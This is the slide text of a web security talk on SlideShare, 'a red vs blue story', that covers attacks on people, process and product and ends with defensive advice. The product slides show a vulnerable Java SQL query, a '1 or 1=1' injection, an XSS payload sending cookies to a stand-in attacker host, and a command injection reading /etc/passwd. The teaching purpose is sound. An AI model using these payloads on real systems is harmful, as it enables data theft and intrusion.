SlideShare a Scribd company logo
Disclaimer
Rolf Huisman
Rolf Huisman (Long ago)
The candy drum
Matter of tradition
So how do we prevent this ?
Countermeasure
Change of attack
The candy drum of information
Impact of not taking care has changed a bit
*In dutch: Algemene verordening gegevensbescherming (AVG)
Impact of not taking care has changed a bit
*In dutch: Algemene verordening gegevensbescherming (AVG)
ING Bank (2017)
~ 680 Million
Alphabet (Google)
~ 4.4 Billion (2017)
Microsoft (2017)
~ 3.6 Billion
Rabobank (2017)
~ 104 Million
Facebook (2017)
~ 1.6 Billion
Motivation for securing
Two parties in an arms race
Red Team: Become the attacker
Blue Team: Protector of assets
So where is the attack focus ?
Agenda (Attack Vectors)
People
ProcessProduct
Lets attack the weakest point first
People
ProcessProduct
People
People
People
People
People
People
People
People
People
Target
Identities
Position
Authorizations
Habits
Likes and
Dislikes
Motivations
People
People
People
Your
WebApp
People
Your
WebApp
People
Attacking the process
People
ProcessProduct
Process
Process
Target
Responsible
people
Handovers
and systems
Conditions
and
assumptions
The formal
way and real
way
Timeline
Exceptions
and
escalations
Process
Process
Process
Process
Process
Process
Process
Process
Process Spoofing
Tampering
Repudiation
Information
disclosure
Denial of
service
Elevation of
privilege
Process
Finally attacking technology
People
ProcessProduct
Product
Product
Product
Product
Product Youtube: LiveOverflow
Product Youtube: LiveOverflow
Product Youtube: LiveOverflow
Product
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
request.getParameter("user_id");
try
{
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
while (rs.next())
{
page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
}
} catch (SQLException e) { ... }
Product
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
request.getParameter("user_id");
try
{
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
while (rs.next())
{
page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
}
} catch (SQLException e) { ... }
Product
1234
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
request.getParameter("user_id");
try
{
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
while (rs.next())
{
page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
}
} catch (SQLException e) { ... }
Product
1234
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
1234;
try
{
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
while (rs.next())
{
page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
}
} catch (SQLException e) { ... }
Product
1234
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1234
Product
1234
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1234
AccountNumber Balance
1234 20.000.000,00
Product
1234
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1234
1%20or%201%2f1
Product
1234
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1234
1%20or%201%2f1
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1 or 1=1
Product
1%20or%201%2f1
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1 or 1=1
AccountNumber Balance
1 5000,12
2 16.000,56
3 30.020.212,82
4 34.232,94
… …
Product
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
Product
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1
<H1>Hi Rolf</H1>
<H1>Hi <script>window.location="http://some_attacker/cookie.cgi?steal=" +escape(document.cookie)</script> </H1>
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
Product
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1
<H1>Hi Rolf</H1>
$ rm tempfile;id;cat /etc/passwd
$ rm tempfile
<H1>Hi <script>window.location="http://some_attacker/cookie.cgi?steal=" +escape(document.cookie)</script> </H1>
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
Product
Product
Product
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
request.getParameter("user_id");
String userId = request.getParameter("user_id");
String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = ? ";
Product
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
request.getParameter("user_id");
String userId = request.getParameter("user_id");
String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = ? ";
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
PreparedStatement statement = connection.preparereStatement(accountBalanceQuery);
statement.setString (1,userId);
ResultSet rs = statement.executeQuery();
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Summary
People
ProcessProduct
Summary
People
• Make it easy to
be safe
• Security event
monitoring
• …
ProcessProduct
Summary
People
• Make it easy to
be safe
• Security event
monitoring
• …
Process
• Misuse cases
• Threat modeling
• STRIDE
• …
Product
Summary
People
• Make it easy to be
safe
• Security event
monitoring
• …
Process
• Misuse cases
• Threat modeling
• STRIDE
• …
Product
• Get Trained
• Use the correct
API’s and tools
• Have things tested
• …
Further Reading
So let us keep our candy safe !
Questions ?

More Related Content

Similar to Web security a red vs blue story

From Vision Statement to Product Backlog
From Vision Statement to Product BacklogFrom Vision Statement to Product Backlog
From Vision Statement to Product Backlog
Luiz C. Parzianello
 
Forecasting strategies for food companies
Forecasting strategies for food companiesForecasting strategies for food companies
Forecasting strategies for food companies
Odete Passingham
 
How can you leverage data to improve your customer success?
How can you leverage data to improve your customer success?How can you leverage data to improve your customer success?
How can you leverage data to improve your customer success?
Andrea Balducci
 
Risk Management Plan Analysis Powerpoint Presentation Slides
Risk Management Plan Analysis Powerpoint Presentation SlidesRisk Management Plan Analysis Powerpoint Presentation Slides
Risk Management Plan Analysis Powerpoint Presentation Slides
SlideTeam
 
Identity Management: Risk Across The Enterprise
Identity Management: Risk Across The EnterpriseIdentity Management: Risk Across The Enterprise
Identity Management: Risk Across The Enterprise
Perficient, Inc.
 
Assessment 3 - Project Report _Template (2).docx
Assessment 3 - Project Report _Template (2).docxAssessment 3 - Project Report _Template (2).docx
Assessment 3 - Project Report _Template (2).docx
LankaniPerera
 
Tpmg Manage Cust Prof Final
Tpmg Manage Cust Prof FinalTpmg Manage Cust Prof Final
Tpmg Manage Cust Prof Final
John Tyler
 
Betty Kayton : Building an Operating Plan and Financial Model
Betty Kayton : Building an Operating Plan and Financial ModelBetty Kayton : Building an Operating Plan and Financial Model
Betty Kayton : Building an Operating Plan and Financial ModelStas Khirman
 
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...
Microsoft
 
UXDX London - Growth = product ( design x engineering) ^ marketing
UXDX London - Growth = product ( design x engineering) ^ marketing UXDX London - Growth = product ( design x engineering) ^ marketing
UXDX London - Growth = product ( design x engineering) ^ marketing
UXDXConf
 
Cloud books presentation(2)
Cloud books presentation(2)Cloud books presentation(2)
Cloud books presentation(2)
Suraj Kumar
 
Startup Metrics for Pirates (Nov 2010)
Startup Metrics for Pirates (Nov 2010)Startup Metrics for Pirates (Nov 2010)
Startup Metrics for Pirates (Nov 2010)
Dave McClure
 
Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...
 Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall... Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...
Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...
FinTech Belgium
 
Mdia p3-03-the-profit-dimension-150420
Mdia p3-03-the-profit-dimension-150420Mdia p3-03-the-profit-dimension-150420
Mdia p3-03-the-profit-dimension-150420
Peter Burgess
 
Hyperion financial management: Application design for performance
Hyperion financial management: Application design for performanceHyperion financial management: Application design for performance
Hyperion financial management: Application design for performanceAlithya
 
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...
saastr
 
Prevention And Mitigation In Disaster Management PowerPoint Presentation Slides
Prevention And Mitigation In Disaster Management PowerPoint Presentation SlidesPrevention And Mitigation In Disaster Management PowerPoint Presentation Slides
Prevention And Mitigation In Disaster Management PowerPoint Presentation Slides
SlideTeam
 
Global In-House Contact Center Benchmark Report Highlights July 2017
Global In-House Contact Center Benchmark Report Highlights July 2017Global In-House Contact Center Benchmark Report Highlights July 2017
Global In-House Contact Center Benchmark Report Highlights July 2017
Golden Gate BPO Solutions
 
Startup Valuation and is there a Bubble?
Startup Valuation and is there a Bubble?Startup Valuation and is there a Bubble?
Startup Valuation and is there a Bubble?
i5invest
 
Protect-Biz for business advisors (e.g., CPAs)
Protect-Biz for business advisors (e.g., CPAs)Protect-Biz for business advisors (e.g., CPAs)
Protect-Biz for business advisors (e.g., CPAs)
Salt Marsh Solutions, Inc.
 

Similar to Web security a red vs blue story (20)

From Vision Statement to Product Backlog
From Vision Statement to Product BacklogFrom Vision Statement to Product Backlog
From Vision Statement to Product Backlog
 
Forecasting strategies for food companies
Forecasting strategies for food companiesForecasting strategies for food companies
Forecasting strategies for food companies
 
How can you leverage data to improve your customer success?
How can you leverage data to improve your customer success?How can you leverage data to improve your customer success?
How can you leverage data to improve your customer success?
 
Risk Management Plan Analysis Powerpoint Presentation Slides
Risk Management Plan Analysis Powerpoint Presentation SlidesRisk Management Plan Analysis Powerpoint Presentation Slides
Risk Management Plan Analysis Powerpoint Presentation Slides
 
Identity Management: Risk Across The Enterprise
Identity Management: Risk Across The EnterpriseIdentity Management: Risk Across The Enterprise
Identity Management: Risk Across The Enterprise
 
Assessment 3 - Project Report _Template (2).docx
Assessment 3 - Project Report _Template (2).docxAssessment 3 - Project Report _Template (2).docx
Assessment 3 - Project Report _Template (2).docx
 
Tpmg Manage Cust Prof Final
Tpmg Manage Cust Prof FinalTpmg Manage Cust Prof Final
Tpmg Manage Cust Prof Final
 
Betty Kayton : Building an Operating Plan and Financial Model
Betty Kayton : Building an Operating Plan and Financial ModelBetty Kayton : Building an Operating Plan and Financial Model
Betty Kayton : Building an Operating Plan and Financial Model
 
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...
 
UXDX London - Growth = product ( design x engineering) ^ marketing
UXDX London - Growth = product ( design x engineering) ^ marketing UXDX London - Growth = product ( design x engineering) ^ marketing
UXDX London - Growth = product ( design x engineering) ^ marketing
 
Cloud books presentation(2)
Cloud books presentation(2)Cloud books presentation(2)
Cloud books presentation(2)
 
Startup Metrics for Pirates (Nov 2010)
Startup Metrics for Pirates (Nov 2010)Startup Metrics for Pirates (Nov 2010)
Startup Metrics for Pirates (Nov 2010)
 
Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...
 Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall... Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...
Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...
 
Mdia p3-03-the-profit-dimension-150420
Mdia p3-03-the-profit-dimension-150420Mdia p3-03-the-profit-dimension-150420
Mdia p3-03-the-profit-dimension-150420
 
Hyperion financial management: Application design for performance
Hyperion financial management: Application design for performanceHyperion financial management: Application design for performance
Hyperion financial management: Application design for performance
 
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...
 
Prevention And Mitigation In Disaster Management PowerPoint Presentation Slides
Prevention And Mitigation In Disaster Management PowerPoint Presentation SlidesPrevention And Mitigation In Disaster Management PowerPoint Presentation Slides
Prevention And Mitigation In Disaster Management PowerPoint Presentation Slides
 
Global In-House Contact Center Benchmark Report Highlights July 2017
Global In-House Contact Center Benchmark Report Highlights July 2017Global In-House Contact Center Benchmark Report Highlights July 2017
Global In-House Contact Center Benchmark Report Highlights July 2017
 
Startup Valuation and is there a Bubble?
Startup Valuation and is there a Bubble?Startup Valuation and is there a Bubble?
Startup Valuation and is there a Bubble?
 
Protect-Biz for business advisors (e.g., CPAs)
Protect-Biz for business advisors (e.g., CPAs)Protect-Biz for business advisors (e.g., CPAs)
Protect-Biz for business advisors (e.g., CPAs)
 

More from Rolf Huisman

Student session Quantum Computing
Student session Quantum ComputingStudent session Quantum Computing
Student session Quantum Computing
Rolf Huisman
 
Lunch session: Quantum Computing
Lunch session: Quantum ComputingLunch session: Quantum Computing
Lunch session: Quantum Computing
Rolf Huisman
 
Meetup webscale architecture quantum computing (Part 2 16-10-2018)
Meetup webscale architecture quantum computing (Part 2 16-10-2018)Meetup webscale architecture quantum computing (Part 2 16-10-2018)
Meetup webscale architecture quantum computing (Part 2 16-10-2018)
Rolf Huisman
 
Meetup web scale architecture quantum computing (Part 1 16-10-2018)
Meetup web scale architecture quantum computing (Part 1 16-10-2018)Meetup web scale architecture quantum computing (Part 1 16-10-2018)
Meetup web scale architecture quantum computing (Part 1 16-10-2018)
Rolf Huisman
 
Programming quantum computers in Q# (Techorama NL 2018)
Programming quantum computers in Q# (Techorama NL 2018)Programming quantum computers in Q# (Techorama NL 2018)
Programming quantum computers in Q# (Techorama NL 2018)
Rolf Huisman
 
[Lightning] Microsoft q# on vsts mvp lightning
[Lightning] Microsoft q# on vsts mvp lightning[Lightning] Microsoft q# on vsts mvp lightning
[Lightning] Microsoft q# on vsts mvp lightning
Rolf Huisman
 
Rolf huisman programming quantum computers in dot net using q#
Rolf huisman   programming quantum computers in dot net using q#Rolf huisman   programming quantum computers in dot net using q#
Rolf huisman programming quantum computers in dot net using q#
Rolf Huisman
 
Experts live dtap reinvented, a risk driven approach to release pipelines
Experts live dtap reinvented, a risk driven approach to release pipelinesExperts live dtap reinvented, a risk driven approach to release pipelines
Experts live dtap reinvented, a risk driven approach to release pipelines
Rolf Huisman
 
[Lightning talk] Next generation computing with fpga
[Lightning talk] Next generation computing with fpga [Lightning talk] Next generation computing with fpga
[Lightning talk] Next generation computing with fpga
Rolf Huisman
 

More from Rolf Huisman (9)

Student session Quantum Computing
Student session Quantum ComputingStudent session Quantum Computing
Student session Quantum Computing
 
Lunch session: Quantum Computing
Lunch session: Quantum ComputingLunch session: Quantum Computing
Lunch session: Quantum Computing
 
Meetup webscale architecture quantum computing (Part 2 16-10-2018)
Meetup webscale architecture quantum computing (Part 2 16-10-2018)Meetup webscale architecture quantum computing (Part 2 16-10-2018)
Meetup webscale architecture quantum computing (Part 2 16-10-2018)
 
Meetup web scale architecture quantum computing (Part 1 16-10-2018)
Meetup web scale architecture quantum computing (Part 1 16-10-2018)Meetup web scale architecture quantum computing (Part 1 16-10-2018)
Meetup web scale architecture quantum computing (Part 1 16-10-2018)
 
Programming quantum computers in Q# (Techorama NL 2018)
Programming quantum computers in Q# (Techorama NL 2018)Programming quantum computers in Q# (Techorama NL 2018)
Programming quantum computers in Q# (Techorama NL 2018)
 
[Lightning] Microsoft q# on vsts mvp lightning
[Lightning] Microsoft q# on vsts mvp lightning[Lightning] Microsoft q# on vsts mvp lightning
[Lightning] Microsoft q# on vsts mvp lightning
 
Rolf huisman programming quantum computers in dot net using q#
Rolf huisman   programming quantum computers in dot net using q#Rolf huisman   programming quantum computers in dot net using q#
Rolf huisman programming quantum computers in dot net using q#
 
Experts live dtap reinvented, a risk driven approach to release pipelines
Experts live dtap reinvented, a risk driven approach to release pipelinesExperts live dtap reinvented, a risk driven approach to release pipelines
Experts live dtap reinvented, a risk driven approach to release pipelines
 
[Lightning talk] Next generation computing with fpga
[Lightning talk] Next generation computing with fpga [Lightning talk] Next generation computing with fpga
[Lightning talk] Next generation computing with fpga
 

Recently uploaded

Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
Product School
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Thierry Lestable
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 

Recently uploaded (20)

Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 

Web security a red vs blue story